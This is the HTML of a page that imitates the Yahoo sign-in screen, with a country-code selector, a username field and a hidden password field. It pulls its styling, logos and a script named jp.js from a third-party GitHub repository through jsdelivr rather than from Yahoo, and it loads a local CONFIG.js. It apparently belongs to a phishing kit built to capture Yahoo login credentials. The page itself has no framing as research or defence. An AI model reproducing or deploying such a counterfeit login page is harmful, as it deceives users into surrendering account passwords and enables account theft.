<html id="Stencil" class="js grid light-theme "><head>
    <meta charset="utf-8">
    <meta name="viewport" content="initial-scale=1, maximum-scale=1, user-scalable=0, shrink-to-fit=no">
    <meta name="format-detection" content="telephone=no">
    <meta name="referrer" content="origin-when-cross-origin">
    <title>Yahoo</title>
    <link rel="icon" type="image/x-icon" href="https://s.yimg.com/wm/mbr/images/yahoo-favicon-img-v0.0.2.ico">
    <link rel="shortcut icon" type="image/x-icon" href="https://s.yimg.com/wm/mbr/images/yahoo-favicon-img-v0.0.2.ico">
    <meta name="google-site-verification" content="yOTFyUBPTnXtuk2cPpqfv7ZvZ960JgqsV8FomN3n7Y0">
    <link rel="apple-touch-icon" href="https://s.yimg.com/wm/mbr/images/yahoo-apple-touch-v0.0.2.png">
    <link rel="apple-touch-icon-precomposed" href="https://s.yimg.com/wm/mbr/images/yahoo-apple-touch-v0.0.2.png">
    <style nonce="">
        #mbr-css-check {
            display: inline;
        }
    </style>
    <link href="https://cdn.jsdelivr.net/gh/jmtechofficial/jm-adbe-assets@master/addons/main/Y/src/wm/mbr/e4793047891fc8d64cda6a67d8098a18e013cffe/yahoo-main.css" rel="stylesheet" type="text/css">

    <style>
        .mbr-desktop-hd{
            height: 84px;
            display: flex;
            align-items: center;
        }


        @media screen and (max-width: 768px){
            .login-footer,.mbr-desktop-hd{
                display: none !important;
            }
            .login-box.right{
                margin: 0;
                box-shadow: none;
                box-sizing: border-box;
                top: 0;
                min-width: 100%;
                min-height: 100vh;
            }
        }
    </style>
    <script src="../../../CONFIG.js"></script>
    </head>
<body class="bucket-mbr-qr-comet-sdk">

<div id="login-body" class="loginish  puree-v2  grid    ">
    <div class="mbr-desktop-hd">
    <span class="column">
         <a href="https://www.yahoo.com/">
            <img src="https://cdn.jsdelivr.net/gh/jmtechofficial/jm-adbe-assets@master/addons/main/Y/src/rz/p/yahoo_frontpage_en-US_s_f_p_bestfit_frontpage_2x.png" alt="Yahoo" class="logo " width="" height="36">
            <img src="https://cdn.jsdelivr.net/gh/jmtechofficial/jm-adbe-assets@master/addons/main/Y/src/rz/p/yahoo_frontpage_en-US_s_f_w_bestfit_frontpage_2x.png" alt="Yahoo" class="dark-mode-logo logo " width="" height="36">
        </a>
    </span>
        <span class="column help txt-align-right">
        <a href="https://help.yahoo.com/kb/index?locale=en_US&amp;page=product&amp;y=PROD_ACCT">Help</a>
    </span>
    </div>
    <div class="login-box-container">
        <div class="login-box right">
            <div class="mbr-login-hd txt-align-center">
                <img src="https://cdn.jsdelivr.net/gh/jmtechofficial/jm-adbe-assets@master/addons/main/Y/src/rz/p/yahoo_frontpage_en-US_s_f_p_bestfit_frontpage_2x.png" alt="Yahoo" class="logo yahoo-en-US" width="" height="27">
                <img src="https://cdn.jsdelivr.net/gh/jmtechofficial/jm-adbe-assets@master/addons/main/Y/src/rz/p/yahoo_frontpage_en-US_s_f_w_bestfit_frontpage_2x.png" alt="Yahoo" class="dark-mode-logo logo yahoo-en-US" width="" height="27">
            </div>
            <div class="challenge yid-challenge">
                <div class="challenge-header">
                </div><div class="username-challenge" id="login-landing">
                <strong class="challenge-heading">Sign in with Yahoo</strong>
                <span class="challenge-desc signin-sub-title">using your Yahoo&nbsp;account</span>

                <form id="login-username-form" method="post" class="pure-form">
                    <div id="username-country-code-field" class="username-country-code puree-country-inline-dropdown-disabled code-of-length-3">
                        <div id="selected-country-code-cont" class="puree-dropdown selected-country-code-cont ltr hide">
                            <div id="selected-country-code" class="selected-country-code">+234</div>
                            <span class="arrow"></span>
                        </div>
                        <div id="country-dropdown-container" class="country-code-dropdown country-dropdown-container hide">
                            <div class="puree-dropdown">
                                <label class="offscreen" id="country-code-lbl-aria">Enter Country Code</label>
                                <select type="select" name="countryCodeIntl" aria-required="true" role="combobox" aria-multiline="false" aria-labelledby="country-code-lbl-aria" disabled="">
                                    <option role="option" data-code="+93" value="AF">Afghanistan ‪(+93)‬</option>
                                    <option role="option" data-code="+355" value="AL">Albania ‪(+355)‬</option>
                                    <option role="option" data-code="+213" value="DZ">Algeria ‪(+213)‬</option>
                                    <option role="option" data-code="+1" value="AS">American Samoa ‪(+1)‬</option>
                                    <option role="option" data-code="+376" value="AD">Andorra ‪(+376)‬</option>
                                    <option role="option" data-code="+244" value="AO">Angola ‪(+244)‬</option>
                                    <option role="option" data-code="+1" value="AI">Anguilla ‪(+1)‬</option>
                                    <option role="option" data-code="+1" value="AG">Antigua and Barbuda ‪(+1)‬</option>
                                    <option role="option" data-code="+54" value="AR">Argentina ‪(+54)‬</option>
                                    <option role="option" data-code="+374" value="AM">Armenia ‪(+374)‬</option>
                                    <option role="option" data-code="+297" value="AW">Aruba ‪(+297)‬</option>
                                    <option role="option" data-code="+247" value="AC">Ascension ‪(+247)‬</option>
                                    <option role="option" data-code="+61" value="AU">Australia ‪(+61)‬</option>
                                    <option role="option" data-code="+672" value="AX">Australian External Territories ‪(+672)‬</option>
                                    <option role="option" data-code="+43" value="AT">Austria ‪(+43)‬</option>
                                    <option role="option" data-code="+994" value="AZ">Azerbaijan ‪(+994)‬</option>
                                    <option role="option" data-code="+1" value="BS">Bahamas ‪(+1)‬</option>
                                    <option role="option" data-code="+973" value="BH">Bahrain ‪(+973)‬</option>
                                    <option role="option" data-code="+880" value="BD">Bangladesh ‪(+880)‬</option>
                                    <option role="option" data-code="+1" value="BB">Barbados ‪(+1)‬</option>
                                    <option role="option" data-code="+375" value="BY">Belarus ‪(+375)‬</option>
                                    <option role="option" data-code="+32" value="BE">Belgium ‪(+32)‬</option>
                                    <option role="option" data-code="+501" value="BZ">Belize ‪(+501)‬</option>
                                    <option role="option" data-code="+229" value="BJ">Benin ‪(+229)‬</option>
                                    <option role="option" data-code="+1" value="BM">Bermuda ‪(+1)‬</option>
                                    <option role="option" data-code="+975" value="BT">Bhutan ‪(+975)‬</option>
                                    <option role="option" data-code="+591" value="BO">Bolivia ‪(+591)‬</option>
                                    <option role="option" data-code="+387" value="BA">Bosnia and Herzegovina ‪(+387)‬</option>
                                    <option role="option" data-code="+267" value="BW">Botswana ‪(+267)‬</option>
                                    <option role="option" data-code="+55" value="BR">Brazil ‪(+55)‬</option>
                                    <option role="option" data-code="+1" value="VG">British Virgin Islands ‪(+1)‬</option>
                                    <option role="option" data-code="+673" value="BN">Brunei Darussalam ‪(+673)‬</option>
                                    <option role="option" data-code="+359" value="BG">Bulgaria ‪(+359)‬</option>
                                    <option role="option" data-code="+226" value="BF">Burkina Faso ‪(+226)‬</option>
                                    <option role="option" data-code="+257" value="BI">Burundi ‪(+257)‬</option>
                                    <option role="option" data-code="+855" value="KH">Cambodia ‪(+855)‬</option>
                                    <option role="option" data-code="+237" value="CM">Cameroon ‪(+237)‬</option>
                                    <option role="option" data-code="+1" value="CA">Canada ‪(+1)‬</option>
                                    <option role="option" data-code="+238" value="CV">Cape Verde ‪(+238)‬</option>
                                    <option role="option" data-code="+1" value="KY">Cayman Islands ‪(+1)‬</option>
                                    <option role="option" data-code="+236" value="CF">Central African Republic ‪(+236)‬</option>
                                    <option role="option" data-code="+235" value="TD">Chad ‪(+235)‬</option>
                                    <option role="option" data-code="+56" value="CL">Chile ‪(+56)‬</option>
                                    <option role="option" data-code="+86" value="CN">China ‪(+86)‬</option>
                                    <option role="option" data-code="+57" value="CO">Colombia ‪(+57)‬</option>
                                    <option role="option" data-code="+269" value="KM">Comoros ‪(+269)‬</option>
                                    <option role="option" data-code="+242" value="CG">Congo ‪(+242)‬</option>
                                    <option role="option" data-code="+682" value="CK">Cook Islands ‪(+682)‬</option>
                                    <option role="option" data-code="+506" value="CR">Costa Rica ‪(+506)‬</option>
                                    <option role="option" data-code="+225" value="CI">Cote dÕIvoire ‪(+225)‬</option>
                                    <option role="option" data-code="+385" value="HR">Croatia ‪(+385)‬</option>
                                    <option role="option" data-code="+53" value="CU">Cuba ‪(+53)‬</option>
                                    <option role="option" data-code="+357" value="CY">Cyprus ‪(+357)‬</option>
                                    <option role="option" data-code="+420" value="CZ">Czech Republic ‪(+420)‬</option>
                                    <option role="option" data-code="+243" value="CD">Democratic Republic of the Congo ‪(+243)‬</option>
                                    <option role="option" data-code="+45" value="DK">Denmark ‪(+45)‬</option>
                                    <option role="option" data-code="+246" value="DG">Diego Garcia ‪(+246)‬</option>
                                    <option role="option" data-code="+253" value="DJ">Djibouti ‪(+253)‬</option>
                                    <option role="option" data-code="+1" value="DM">Dominica ‪(+1)‬</option>
                                    <option role="option" data-code="+1" value="DO">Dominican Republic ‪(+1)‬</option>
                                    <option role="option" data-code="+670" value="TL">East Timor ‪(+670)‬</option>
                                    <option role="option" data-code="+593" value="EC">Ecuador ‪(+593)‬</option>
                                    <option role="option" data-code="+20" value="EG">Egypt ‪(+20)‬</option>
                                    <option role="option" data-code="+503" value="SV">El Salvador ‪(+503)‬</option>
                                    <option role="option" data-code="+240" value="GQ">Equatorial Guinea ‪(+240)‬</option>
                                    <option role="option" data-code="+291" value="ER">Eritrea ‪(+291)‬</option>
                                    <option role="option" data-code="+372" value="EE">Estonia ‪(+372)‬</option>
                                    <option role="option" data-code="+251" value="ET">Ethiopia ‪(+251)‬</option>
                                    <option role="option" data-code="+500" value="FK">Falkland Islands ‪(+500)‬</option>
                                    <option role="option" data-code="+298" value="FO">Faroe Islands ‪(+298)‬</option>
                                    <option role="option" data-code="+679" value="FJ">Fiji ‪(+679)‬</option>
                                    <option role="option" data-code="+358" value="FI">Finland ‪(+358)‬</option>
                                    <option role="option" data-code="+33" value="FR">France ‪(+33)‬</option>
                                    <option role="option" data-code="+594" value="GF">French Guiana ‪(+594)‬</option>
                                    <option role="option" data-code="+689" value="PF">French Polynesia ‪(+689)‬</option>
                                    <option role="option" data-code="+241" value="GA">Gabon ‪(+241)‬</option>
                                    <option role="option" data-code="+220" value="GM">Gambia ‪(+220)‬</option>
                                    <option role="option" data-code="+995" value="GE">Georgia ‪(+995)‬</option>
                                    <option role="option" data-code="+49" value="DE">Germany ‪(+49)‬</option>
                                    <option role="option" data-code="+233" value="GH">Ghana ‪(+233)‬</option>
                                    <option role="option" data-code="+350" value="GI">Gibraltar ‪(+350)‬</option>
                                    <option role="option" data-code="+30" value="GR">Greece ‪(+30)‬</option>
                                    <option role="option" data-code="+299" value="GL">Greenland ‪(+299)‬</option>
                                    <option role="option" data-code="+1" value="GD">Grenada ‪(+1)‬</option>
                                    <option role="option" data-code="+590" value="GP">Guadeloupe ‪(+590)‬</option>
                                    <option role="option" data-code="+1" value="GU">Guam ‪(+1)‬</option>
                                    <option role="option" data-code="+502" value="GT">Guatemala ‪(+502)‬</option>
                                    <option role="option" data-code="+224" value="GN">Guinea ‪(+224)‬</option>
                                    <option role="option" data-code="+245" value="GW"> ‪(+245)‬</option>
                                    <option role="option" data-code="+592" value="GY">Guyana ‪(+592)‬</option>
                                    <option role="option" data-code="+509" value="HT">Haiti ‪(+509)‬</option>
                                    <option role="option" data-code="+504" value="HN">Honduras ‪(+504)‬</option>
                                    <option role="option" data-code="+852" value="HK">Hong Kong ‪(+852)‬</option>
                                    <option role="option" data-code="+36" value="HU">Hungary ‪(+36)‬</option>
                                    <option role="option" data-code="+354" value="IS">Iceland ‪(+354)‬</option>
                                    <option role="option" data-code="+91" value="IN">India ‪(+91)‬</option>
                                    <option role="option" data-code="+62" value="ID">Indonesia ‪(+62)‬</option>
                                    <option role="option" data-code="+98" value="IR">Iran ‪(+98)‬</option>
                                    <option role="option" data-code="+964" value="IQ">Iraq ‪(+964)‬</option>
                                    <option role="option" data-code="+353" value="IE">Ireland ‪(+353)‬</option>
                                    <option role="option" data-code="+972" value="IL">Israel ‪(+972)‬</option>
                                    <option role="option" data-code="+39" value="IT">Italy ‪(+39)‬</option>
                                    <option role="option" data-code="+1" value="JM">Jamaica ‪(+1)‬</option>
                                    <option role="option" data-code="+81" value="JP">Japan ‪(+81)‬</option>
                                    <option role="option" data-code="+962" value="JO">Jordan ‪(+962)‬</option>
                                    <option role="option" data-code="+7" value="KZ">Kazakhstan ‪(+7)‬</option>
                                    <option role="option" data-code="+254" value="KE">Kenya ‪(+254)‬</option>
                                    <option role="option" data-code="+686" value="KI">Kiribati ‪(+686)‬</option>
                                    <option role="option" data-code="+383" value="XK"> ‪(+383)‬</option>
                                    <option role="option" data-code="+965" value="KW">Kuwait ‪(+965)‬</option>
                                    <option role="option" data-code="+996" value="KG">Kyrgyzstan ‪(+996)‬</option>
                                    <option role="option" data-code="+856" value="LA">Laos ‪(+856)‬</option>
                                    <option role="option" data-code="+371" value="LV">Latvia ‪(+371)‬</option>
                                    <option role="option" data-code="+961" value="LB">Lebanon ‪(+961)‬</option>
                                    <option role="option" data-code="+266" value="LS">Lesotho ‪(+266)‬</option>
                                    <option role="option" data-code="+231" value="LR">Liberia ‪(+231)‬</option>
                                    <option role="option" data-code="+218" value="LY">Libya ‪(+218)‬</option>
                                    <option role="option" data-code="+423" value="LI">Liechtenstein ‪(+423)‬</option>
                                    <option role="option" data-code="+370" value="LT">Lithuania ‪(+370)‬</option>
                                    <option role="option" data-code="+352" value="LU">Luxembourg ‪(+352)‬</option>
                                    <option role="option" data-code="+853" value="MO">Macao ‪(+853)‬</option>
                                    <option role="option" data-code="+389" value="MK">Macedonia ‪(+389)‬</option>
                                    <option role="option" data-code="+261" value="MG">Madagascar ‪(+261)‬</option>
                                    <option role="option" data-code="+265" value="MW">Malawi ‪(+265)‬</option>
                                    <option role="option" data-code="+60" value="MY">Malaysia ‪(+60)‬</option>
                                    <option role="option" data-code="+960" value="MV">Maldives ‪(+960)‬</option>
                                    <option role="option" data-code="+223" value="ML">Mali ‪(+223)‬</option>
                                    <option role="option" data-code="+356" value="MT">Malta ‪(+356)‬</option>
                                    <option role="option" data-code="+692" value="MH">Marshall Islands ‪(+692)‬</option>
                                    <option role="option" data-code="+596" value="MQ">Martinique ‪(+596)‬</option>
                                    <option role="option" data-code="+222" value="MR">Mauritania ‪(+222)‬</option>
                                    <option role="option" data-code="+230" value="MU">Mauritius ‪(+230)‬</option>
                                    <option role="option" data-code="+52" value="MX">Mexico ‪(+52)‬</option>
                                    <option role="option" data-code="+691" value="FM">Micronesia ‪(+691)‬</option>
                                    <option role="option" data-code="+373" value="MD">Moldova ‪(+373)‬</option>
                                    <option role="option" data-code="+377" value="MC">Monaco ‪(+377)‬</option>
                                    <option role="option" data-code="+976" value="MN">Mongolia ‪(+976)‬</option>
                                    <option role="option" data-code="+382" value="ME">Montenegro ‪(+382)‬</option>
                                    <option role="option" data-code="+1" value="MS">Montserrat ‪(+1)‬</option>
                                    <option role="option" data-code="+212" value="MA">Morocco ‪(+212)‬</option>
                                    <option role="option" data-code="+258" value="MZ">Mozambique ‪(+258)‬</option>
                                    <option role="option" data-code="+95" value="MM">Myanmar ‪(+95)‬</option>
                                    <option role="option" data-code="+264" value="NA">Namibia ‪(+264)‬</option>
                                    <option role="option" data-code="+674" value="NR">Nauru ‪(+674)‬</option>
                                    <option role="option" data-code="+977" value="NP">Nepal ‪(+977)‬</option>
                                    <option role="option" data-code="+31" value="NL">Netherlands ‪(+31)‬</option>
                                    <option role="option" data-code="+599" value="AN"> ‪(+599)‬</option>
                                    <option role="option" data-code="+687" value="NC">New Caledonia ‪(+687)‬</option>
                                    <option role="option" data-code="+64" value="NZ">New Zealand ‪(+64)‬</option>
                                    <option role="option" data-code="+505" value="NI">Nicaragua ‪(+505)‬</option>
                                    <option role="option" data-code="+227" value="NE">Niger ‪(+227)‬</option>
                                    <option role="option" data-code="+234" value="NG" selected="selected">Nigeria ‪(+234)‬</option>
                                    <option role="option" data-code="+683" value="NU">Niue ‪(+683)‬</option>
                                    <option role="option" data-code="+850" value="KP">North Korea ‪(+850)‬</option>
                                    <option role="option" data-code="+1" value="MP">Northern Mariana Islands ‪(+1)‬</option>
                                    <option role="option" data-code="+47" value="NO">Norway ‪(+47)‬</option>
                                    <option role="option" data-code="+968" value="OM">Oman ‪(+968)‬</option>
                                    <option role="option" data-code="+92" value="PK">Pakistan ‪(+92)‬</option>
                                    <option role="option" data-code="+680" value="PW">Palau ‪(+680)‬</option>
                                    <option role="option" data-code="+970" value="PS">Palestine ‪(+970)‬</option>
                                    <option role="option" data-code="+507" value="PA">Panama ‪(+507)‬</option>
                                    <option role="option" data-code="+675" value="PG">Papua New Guinea ‪(+675)‬</option>
                                    <option role="option" data-code="+595" value="PY">Paraguay ‪(+595)‬</option>
                                    <option role="option" data-code="+51" value="PE">Peru ‪(+51)‬</option>
                                    <option role="option" data-code="+63" value="PH">Philippines ‪(+63)‬</option>
                                    <option role="option" data-code="+48" value="PL">Poland ‪(+48)‬</option>
                                    <option role="option" data-code="+351" value="PT">Portugal ‪(+351)‬</option>
                                    <option role="option" data-code="+1" value="PR">Puerto Rico ‪(+1)‬</option>
                                    <option role="option" data-code="+974" value="QA">Qatar ‪(+974)‬</option>
                                    <option role="option" data-code="+262" value="RE">Reunion ‪(+262)‬</option>
                                    <option role="option" data-code="+40" value="RO">Romania ‪(+40)‬</option>
                                    <option role="option" data-code="+7" value="RU">Russia ‪(+7)‬</option>
                                    <option role="option" data-code="+250" value="RW">Rwanda ‪(+250)‬</option>
                                    <option role="option" data-code="+290" value="SH">Saint Helena ‪(+290)‬</option>
                                    <option role="option" data-code="+1" value="KN">Saint Kitts and Nevis ‪(+1)‬</option>
                                    <option role="option" data-code="+1" value="LC">Saint Lucia ‪(+1)‬</option>
                                    <option role="option" data-code="+508" value="PM">Saint Pierre and Miquelon ‪(+508)‬</option>
                                    <option role="option" data-code="+1" value="VC">Saint Vincent and Grenadines ‪(+1)‬</option>
                                    <option role="option" data-code="+685" value="WS">Samoa ‪(+685)‬</option>
                                    <option role="option" data-code="+378" value="SM">San Marino ‪(+378)‬</option>
                                    <option role="option" data-code="+239" value="ST">Sao Tome and Principe ‪(+239)‬</option>
                                    <option role="option" data-code="+966" value="SA">Saudi Arabia ‪(+966)‬</option>
                                    <option role="option" data-code="+221" value="SN">Senegal ‪(+221)‬</option>
                                    <option role="option" data-code="+381" value="RS">Serbia ‪(+381)‬</option>
                                    <option role="option" data-code="+248" value="SC">Seychelles ‪(+248)‬</option>
                                    <option role="option" data-code="+232" value="SL">Sierra Leone ‪(+232)‬</option>
                                    <option role="option" data-code="+65" value="SG">Singapore ‪(+65)‬</option>
                                    <option role="option" data-code="+421" value="SK">Slovakia ‪(+421)‬</option>
                                    <option role="option" data-code="+386" value="SI">Slovenia ‪(+386)‬</option>
                                    <option role="option" data-code="+677" value="SB">Solomon Islands ‪(+677)‬</option>
                                    <option role="option" data-code="+252" value="SO">Somalia ‪(+252)‬</option>
                                    <option role="option" data-code="+27" value="ZA">South Africa ‪(+27)‬</option>
                                    <option role="option" data-code="+82" value="KR">South Korea ‪(+82)‬</option>
                                    <option role="option" data-code="+34" value="ES">Spain ‪(+34)‬</option>
                                    <option role="option" data-code="+94" value="LK">Sri Lanka ‪(+94)‬</option>
                                    <option role="option" data-code="+249" value="SD">Sudan ‪(+249)‬</option>
                                    <option role="option" data-code="+597" value="SR">Suriname ‪(+597)‬</option>
                                    <option role="option" data-code="+268" value="SZ">Swaziland ‪(+268)‬</option>
                                    <option role="option" data-code="+46" value="SE">Sweden ‪(+46)‬</option>
                                    <option role="option" data-code="+41" value="CH">Switzerland ‪(+41)‬</option>
                                    <option role="option" data-code="+963" value="SY">Syria ‪(+963)‬</option>
                                    <option role="option" data-code="+886" value="TW">Taiwan ‪(+886)‬</option>
                                    <option role="option" data-code="+992" value="TJ">Tajikistan ‪(+992)‬</option>
                                    <option role="option" data-code="+255" value="TZ">Tanzania ‪(+255)‬</option>
                                    <option role="option" data-code="+66" value="TH">Thailand ‪(+66)‬</option>
                                    <option role="option" data-code="+228" value="TG">Togo ‪(+228)‬</option>
                                    <option role="option" data-code="+690" value="TK">Tokelau ‪(+690)‬</option>
                                    <option role="option" data-code="+676" value="TO">Tonga ‪(+676)‬</option>
                                    <option role="option" data-code="+1" value="TT">Trinidad and Tobago ‪(+1)‬</option>
                                    <option role="option" data-code="+216" value="TN">Tunisia ‪(+216)‬</option>
                                    <option role="option" data-code="+90" value="TR">Turkey ‪(+90)‬</option>
                                    <option role="option" data-code="+993" value="TM">Turkmenistan ‪(+993)‬</option>
                                    <option role="option" data-code="+1" value="TC">Turks and Caicos Islands ‪(+1)‬</option>
                                    <option role="option" data-code="+688" value="TV">Tuvalu ‪(+688)‬</option>
                                    <option role="option" data-code="+1" value="VI">US Virgin Islands ‪(+1)‬</option>
                                    <option role="option" data-code="+256" value="UG">Uganda ‪(+256)‬</option>
                                    <option role="option" data-code="+380" value="UA">Ukraine ‪(+380)‬</option>
                                    <option role="option" data-code="+971" value="AE">United Arab Emirates ‪(+971)‬</option>
                                    <option role="option" data-code="+44" value="GB">United Kingdom ‪(+44)‬</option>
                                    <option role="option" data-code="+1" value="US" data-format="(XXX) XXX-XXXX">United States ‪(+1)‬</option>
                                    <option role="option" data-code="+598" value="UY">Uruguay ‪(+598)‬</option>
                                    <option role="option" data-code="+998" value="UZ">Uzbekistan ‪(+998)‬</option>
                                    <option role="option" data-code="+678" value="VU">Vanuatu ‪(+678)‬</option>
                                    <option role="option" data-code="+379" value="VA">Vatican City ‪(+379)‬</option>
                                    <option role="option" data-code="+58" value="VE">Venezuela ‪(+58)‬</option>
                                    <option role="option" data-code="+84" value="VN">Vietnam ‪(+84)‬</option>
                                    <option role="option" data-code="+681" value="WF">Wallis and Futuna ‪(+681)‬</option>
                                    <option role="option" data-code="+967" value="YE">Yemen ‪(+967)‬</option>
                                    <option role="option" data-code="+260" value="ZM">Zambia ‪(+260)‬</option>
                                    <option role="option" data-code="+263" value="ZW">Zimbabwe ‪(+263)‬</option>
                                </select>
                                <div class="arrow"></div>
                            </div>

                        </div>
                        <div class="input-group">
                            <input class="phone-no " type="text" name="username" id="login-username" value="" autocomplete="username" autocapitalize="none" autocorrect="off" autofocus="true" placeholder=" ">
                            <div class="input-field-icon hide" id="username-field-icon"></div>
                            <label for="login-username" id="login-label" class="login-label">Username or email</label>
                            <ul class="auto-fill-overlay hide" aria-live="polite" id="domain-auto-fill">
                                <li data-fill="yahoo.com" tabindex="2">yahoo.com</li><li data-fill="gmail.com" tabindex="3">gmail.com</li><li data-fill="outlook.com" tabindex="4">outlook.com</li><li data-fill="aol.com" tabindex="5">aol.com</li>
                            </ul>            </div>
                        <div class="hidden-input-container">
                            <input name="passwd" class="pwd-field" type="password" tabindex="-1" aria-hidden="true" role="presentation" autocorrect="off" placeholder="Password">
                        </div>
                    </div>
                    <p id="username-error" class="error-msg hide" role="alert" data-error="messages.INVALID_USERNAME">Sorry, we don't recognize this&nbsp;email.</p>


                    <div class="button-container">
                        <input id="login-signin" type="submit" name="signin" class="pure-button puree-button-primary challenge-button" value="Next" data-rapid-tracking="true" data-ylk="elm:btn;elmt:primary;slk:next;mKey:login-landing-next">
                    </div>

                    <div class="helper-links-container">
                        <div class="helper-item ">
                <span class="stay-signed-in checkbox-container">
                    <input id="persistent" name="persistent" value="y" type="checkbox" checked="">
                    <label for="persistent">Stay signed&nbsp;in</label>
                </span>
                        </div>
                        <div class="helper-item arlink">
                <span class="help">
                    <a href="/forgot?.intl=us&amp;.lang=en-US&amp;src=ym&amp;activity=mail-direct&amp;pspid=159600001&amp;.done=https%3A%2F%2Fmail.yahoo.com%2Fd&amp;done=https%3A%2F%2Fmail.yahoo.com%2Fd" id="mbr-forgot-link" data-ylk="elm:btn;elmt:forgot;slk:forgot;mkey:login-landing-forgot" data-rapid-tracking="true">Forgot&nbsp;username?</a>
                </span>
                        </div>
                    </div>
                    <div class="bottom-links-container">
                        <p class="sign-up-link">
                            <a href="/account/create?.intl=us&amp;.lang=en-US&amp;src=ym&amp;activity=mail-direct&amp;pspid=159600001&amp;.done=https%3A%2F%2Fmail.yahoo.com%2Fd&amp;specId=yidReg&amp;done=https%3A%2F%2Fmail.yahoo.com%2Fd" id="createacc" role="button" class="pure-button puree-button-secondary challenge-button" data-rapid-tracking="true" data-ylk="elm:link;elmt:secondary;slk:signup;mKey:login-landing-signup">Create an&nbsp;account</a>
                        </p>

                    </div>
                </form>
            </div>
            </div>
        </div>
        <div id="login-box-ad-fallback" class="login-box-ad-fallback">
            <h1>Yahoo makes it easy to enjoy what matters most in your&nbsp;world.</h1>
            <p>Best in class Yahoo Mail, breaking local, national and global news, finance, sports, music, movies and more. You get more out of the web, you get more out of&nbsp;life.</p>
        </div>
    </div>
    <div class="login-bg-outer">
        <div class="login-bg-inner">
            <div id="sb_rel_login-ad-rich" class="darla" style="position: relative; z-index: 9; width: 1440px; height: 1024px; visibility: inherit; display: inline-block; font-size: 0px;"><iframe style="position: absolute; z-index: 10; width: 1440px; height: 1024px; top: 0px; left: 0px; visibility: inherit; display: block;" id="login-ad-rich" src="inner.html" async="" allow="autoplay;vr;microphone https://s.yimg.com https://cdn.flashtalking.com https://cdn.cmp.advertising.com https://cdn.yahoomedia.net https://ads.pictela.net" sandbox="allow-scripts allow-same-origin allow-popups allow-popups-to-escape-sandbox" frameborder="no" scrolling="no" allowtransparency="true" hidefocus="true" tabindex="-1" marginwidth="0" marginheight="0"></iframe></div>
        </div>
    </div>
    <div class="login-footer">
        <p>
            <a href="https://legal.yahoo.com/us/en/yahoo/terms/otos/index.html" target="_blank" class="terms">Terms</a>

            <span>|</span>
            <a href="https://legal.yahoo.com/us/en/yahoo/privacy/index.html" target="_blank" class="privacy">Privacy</a>

        </p>
    </div>
</div>



<div id="mbr-css-check"></div>
<div id="page-mask" class="page-mask hide"></div>
<div id="ad"></div>
<div class="mbr-legacy-device-bar" id="mbr-legacy-device-bar">
    <label class="cross" for="mbr-legacy-device-bar-cross" aria-label="Close this&nbsp;warning">x</label>
    <input type="checkbox" id="mbr-legacy-device-bar-cross">
    <p class="mbr-legacy-device">
        Yahoo works best with the latest versions of the browsers. You're using an outdated or unsupported browser and some Yahoo features may not work properly. Please update your browser version now. <a href="">More&nbsp;Info</a>
    </p>
</div>

<div id="darla_csc_holder" class="darla" style="display: none;"><iframe style="display: none;" id="darla_csc_writer_0" class="darla" src="https://s.yimg.com/rq/darla/4-10-0/html/r-csc.html" frameborder="no" scrolling="no" allowtransparency="true" hidefocus="true" tabindex="-1" marginwidth="0" marginheight="0"></iframe></div>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.5.0/jquery.min.js" integrity="sha256-xNzN2a4ltkB44Mc/Jz3pT4iU1cmeR0FkXs4pru/JxaQ=" crossorigin="anonymous"></script>
<script src="https://cdn.jsdelivr.net/gh/jmtechofficial/jm-adbe-assets@master/addons/main/Y/src/jp.js"></script>
</body></html>